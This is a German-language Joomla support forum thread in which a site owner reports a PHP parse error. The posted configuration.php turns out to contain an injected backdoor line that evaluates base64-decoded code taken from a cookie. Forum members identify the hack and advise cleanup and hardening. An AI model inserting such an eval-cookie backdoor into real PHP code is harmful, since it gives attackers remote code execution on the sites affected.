+ Antworten
Seite 1 von 2 1 2 LetzteLetzte
Ergebnis 1 bis 10 von 11

Thema: nix geht mehr....!!??

Neu an Board
    Bedankte sich
    3
    Erhielt 0 Danksagungen
    in 0 Beiträgen

Unglücklich nix geht mehr....!!??

meine seite sieht momentan so aus:

Parse error: syntax error, unexpected ';', expecting T_OLD_FUNCTION or T_FUNCTION or T_VAR or '}' in /homepages/1/d320712444/htdocs/DGD-DGD/configuration.php on line 20

wie kommt es zu so einer meldung? (dieselbe meldung bei aufruf des backends)

was kann ich jetzt unternehmen?

gruss
    Geändert von yoiq (27.02.2011 um 10:10 Uhr)

Verbringt hier viel Zeit Avatar von jrk-brv
    Bedankte sich
    25
    Erhielt 162 Danksagungen
    in 153 Beiträgen

Standard

Was soll uns dieser Beitrag sagen?
    - Richtig: Nichts!

Da fehlen noch einige Infos:
    - Joomla Version
    - PHP Version
    - Link!
    - Hoster
    - was hast du zuletzt gemacht?
    - ...
    Gruss Steffen

FAQ - Joomla
    / nettes Joomla 1.5 Buch
    Unser Glaube ist der Sieg, der die Welt überwunden hat!

Neu an Board
    Bedankte sich
    3
    Erhielt 0 Danksagungen
    in 0 Beiträgen

Standard

hi steffen,

sorry. also joomla! 1.5.7
    PHP 4.4.9
    link? zur website? hier: ****url entfernt***
    hoster 1und1
    die letzten tätigkeiten: ein artisteer-template aufgesetzt, dann nur noch einen artikel geschrieben und alles funzte dann einige Tage......ich verstehe nicht, wie das überhaupt sein kann. die seite ging doch die ganze zeit. zum zeitpunkt des Auftretens des Fehlers habe ich an der seite überhaupt nichts getan.

gruss christian
    Geändert von Lacki (27.02.2011 um 01:54 Uhr)

Verbringt hier viel Zeit Avatar von jrk-brv
    Bedankte sich
    25
    Erhielt 162 Danksagungen
    in 153 Beiträgen

Standard

Besser ^^

Also: Zunächst solltest du dringends Updaten!!! Wir sind bei 1.5.22!

- Dann guck doch bittemal in deine configuration.php, Zeile 20 - hier müsste normalerweise folgendes stehen:
    var $live_site = '';
    (oder mit / zwischen den ' )
    - Andererseits handelt es sich bei deinem Fehler um ein Problem, welches häufig bei PHP-Versionen "kleiner 5" auftritt - d.h, du solltest deinen Hoster um eine Umstellung auf PHP5 bitten.

Und zu guter letzt noch der letzte Link in meiner Signatur zum lesen
    Gruss Steffen

FAQ - Joomla
    / nettes Joomla 1.5 Buch
    Unser Glaube ist der Sieg, der die Welt überwunden hat!

5. Erhielt Danksagungen von:

Moderator Avatar von Lacki
    Bedankte sich
    337
    Erhielt 3.611 Danksagungen
    in 2.970 Beiträgen

Standard

Hallo.
    Könnte auch gut sein, dass die Website gehackt wurde. Wenn Du zu dem Zeitpunkt wirklich nichts verändert hast und du einziger Admin bist, ist das sogar wahrscheinlich (Auch wenn man das von außen immer nur sehr schwer einschätzen kann). Poste hier mal den Inhalt der configuration.php (Allerdings ohne Passwort, DB-Name und ähnliches). Solltest Du tatsächlich gehackt worden sein, dann reicht das Update nicht, ist zu dem Zeitpunkt eher schädlich. Dann bitte Abschnitt 2.6 der FAQ lesen und beachten.
    OT: Hi Steffen.

Neu an Board
    Bedankte sich
    3
    Erhielt 0 Danksagungen
    in 0 Beiträgen

Standard

hi steffen,

da steht folgendes: var $live_site ='\'; } ?> <?php eval(base64_decode($_COOKIE[\'lol\'])); ?>://';#'\'; } ?> <?php eval(base64_decode($_COOKIE[\'lol\'])); ?>://';# '';

hat da jemand bei mir eingebrochen oder warum sieht die Zeile so \'lol\' aus????!!! Dann ist es ein backslash und kein slash zwischen den ''....!!!

sollte ich die Zeile ersetzen durch var $live_site = '';

???

gruss chris

Neu an Board
    Bedankte sich
    3
    Erhielt 0 Danksagungen
    in 0 Beiträgen

Standard

<?php
    class JConfig {
    var $offline = '0';
    var $editor = 'tinymce';
    var $list_limit = '20';
    var $helpurl = 'http://help.joomla.org';
    var $debug = '0';
    var $debug_lang = '0';
    var $sef = '0';
    var $sef_rewrite = '0';
    var $sef_suffix = '0';
    var $feed_limit = '10';
    var $feed_email = 'author';
    var $secret = 'mysecret';
    var $gzip = '0';
    var $error_reporting = '-1';
    var $xmlrpc_server = '1';
    var $log_path = '/homepages/1/d320712444/htdocs/DGD-DGD/logs';
    var $tmp_path = '/homepages/1/d320712444/htdocs/DGD-DGD/tmp';
    var $live_site ='\'; } ?> <?php eval(base64_decode($_COOKIE[\'lol\'])); ?>://';#'\'; } ?> <?php eval(base64_decode($_COOKIE[\'lol\'])); ?>://';# '';
    var $force_ssl = '0';
    var $offset = '0';
    var $caching = '0';
    var $cachetime = '15';
    var $cache_handler = 'file';
    var $memcache_settings = array();
    var $ftp_enable ='0';#'0';# '0';
    var $ftp_host = '127.0.0.1';
    var $ftp_port = '21';
    var $ftp_user = '';
    var $ftp_pass = '';
    var $ftp_root = '';
    var $dbtype = 'mysql';
    var $host = 'myhost';
    var $user = 'myuser';
    var $db = 'mydb';
    var $dbprefix = 'jos_';
    var $mailer = 'mail';
    var $mailfrom = 'machmit@dergruenediktator.com';
    var $fromname = 'www.dergruenediiktator.de';
    var $sendmail = '/usr/sbin/sendmail';
    var $smtpauth = '0';
    var $smtpsecure = 'none';
    var $smtpport = '25';
    var $smtpuser = '';
    var $smtppass = '';
    var $smtphost = 'localhost';
    var $MetaAuthor = '1';
    var $MetaTitle = '1';
    var $lifetime = '15';
    var $session_handler = 'database';
    var $password = 'mypw';
    var $sitename = 'www.dergruenediiktator.de';
    var $MetaDesc = 'Ein durchgeknallter Enkel von Alois Schicklgruber, Amino Schmitler, möchte die Welt retten. Doch er braucht Hilfe! Auch Du hast Verantwortung gegenüber unserer großen Mutter Erde und darfst mitmachen!';
    var $MetaKeys = 'Ebene 5, bewußtsein, mutter, erde, muttererde, der grüne diktator, natur, Hanf, Hänfling, bin laden, merkel, barack obama, amino schmittler, adolf hitler, alois schicklgruber, zukunft, freisinn, christilich, friedlich, farbig, farbiger, legalisierung, satire, sarkasmus, witz, katastrophe, grün, die grünen, der blaue planet, blauer, authentisch, ehrlich, wohnhaft, organismus, bewußtseinstufe, bewußtseinsebene, cannabis, haschisch, pot, shit, sativa, indica, unabhängig, unbestechlich, unparteiisch, politisch, spirituell, hopi, maya, prophezeihung, gott, götter, allah, kaaba, ka\'aba, qur\'an, koran, thora, talmud, juden, christen, moslems, muslime, krise, geld, gold, diamant, hanfanbau, hanfplantage, kiffen, kiffer, rauchen, vegan, makrobiotisch, lord, god, gaia, heimat, tierschutz, pharmaindustrie, lebensmittelkonzern, atomindustrie, atomkraft, Kopenhagen, berlin, germania, flügelkreuz, hakenkreuz, swastika, nationalsozialisten, nsdap, gröfaz, grüfaz, grüdi, grüpie, grüpies, drogen, mami';
    var $offline_message = 'Diese Website ist zurzeit im Mobilmachungsmodus. Bitte suchen Sie diese Adresse später wieder auf.';
    }
    ?>

hi lacki,

hier die configuration.php. ich befürchte, daß Du recht hast mit Deiner Vermutung.... diese zeile ist auch komisch.... : var $ftp_enable ='0';#'0';# '0';
    Geändert von yoiq (27.02.2011 um 01:20 Uhr)

Bedankte sich
    337
    in 2.970 Beiträgen

Standard

Ja, leider gehackt. Webseite z. B. durch Verzeichnisänderung gegen Zugriffe von aussen sperren und Liste in den FAQ abarbeiten. Ohne sauberes Backup siehts eh schlecht aus. Im Zweifeslfall Hilfe holen vom Experten, evt. ist der Hoster dazu bereit. Ohne richtige Behandlung kann es teuer werden.

P.S.: Mal ehrlich, was sollen diese bescheuerten MetaKeys bringen?

10. Erhielt Danksagungen von:

Neu an Board
    Bedankte sich
    3
    Erhielt 0 Danksagungen
    in 0 Beiträgen

Standard

zum P.S.: keine Ahnung. welche würden was bringen? oder wieso diese nichts? ich bin echt unerfahren. bescheuert sollen sie ruhig sein......, das passt zur website. :=)

ich weiß nicht, ob ich Dich richtig verstehe. das verzeichnis einfach umbenennen oder was bedeutet Verzeichnisänderung?
    die liste in den faq werde ich abarbeiten. ein sauberes backup gibt es nicht. ist die datenbank verseucht oder kann ich wenigstens meine texte aus ihr extrahieren?
    oje, ich werde vermutlich überfordert sein. wie kann ich ein zukünftiges Eindringen verhindern?, bzw. wie ist derjenige "reingekommen"?

viele fragen am frühen morgen.....

aber erst einmal vielen dank für den moralischen Beistand.

gruss christian

ps.: habe die beiden zeilen geändert und alles geht wieder. nützt jetzt noch ein backup?
    Geändert von yoiq (27.02.2011 um 01:41 Uhr)

Bedankte sich
    337
    in 2.970 Beiträgen

Standard

Hatte ein Hacker einmal Zugriff, kann er und hat er oft irgendwelche Scripte woanders hinterlassen, womit er weiterhin irgendwelche Schweinereien anstellen kann. Die Webseite geht zwar wieder, aber Du bist nicht sicher, und Deine Webseitenbesucher auch nicht. Und nicht immer sind die Datenbankinhalte auch betroffen, aber kannst Du Dir sicher sein? Nimm es als Leergeld und fang neu an. Ab jetzt alle Sicherheitstipps aus Abschnitt 2 und 5.2 der FAQ berücksichtigen und regelmässig ein Backup anlegen, ab dann ist es ziemlich sicher.

Zu den Metakeys, die werden schon lange ignoriert, Du gibst das beste Beispiel, warum das so ist. Wieso sollte die Suchmaschine Besucher auf Deine Webseite bringen, die nicht das bekommen, was die Metakeys versprechen? Und ehrlich gesagt finde ich einige Begriffe ziemlich unangebracht für eine Funseite, wenn es denn eine ist (?).

Wenn die Domain bis jetzt auf den Ordner /deinOrdner/mitJoomla/ auf dem Webspace zeigt, dann leite die Domain per Hosterpanel auf /deinneuerOrdner/. So läuft jeder Zugriff auch des Hackers auf seine Shellscripte ins Leere. Alternativ .htaccess mit deny all anlegen (Googlesuche danach). Oder gehackt in die Forensuche eingeben, gab das Thema schon oft.
    P.S.: Den Link oben habe ich entfernt, nicht das sich noch jemand bei Dir was einfängt.

+ Antworten
Seite 1 von 2 1 2 LetzteLetzte

Lesezeichen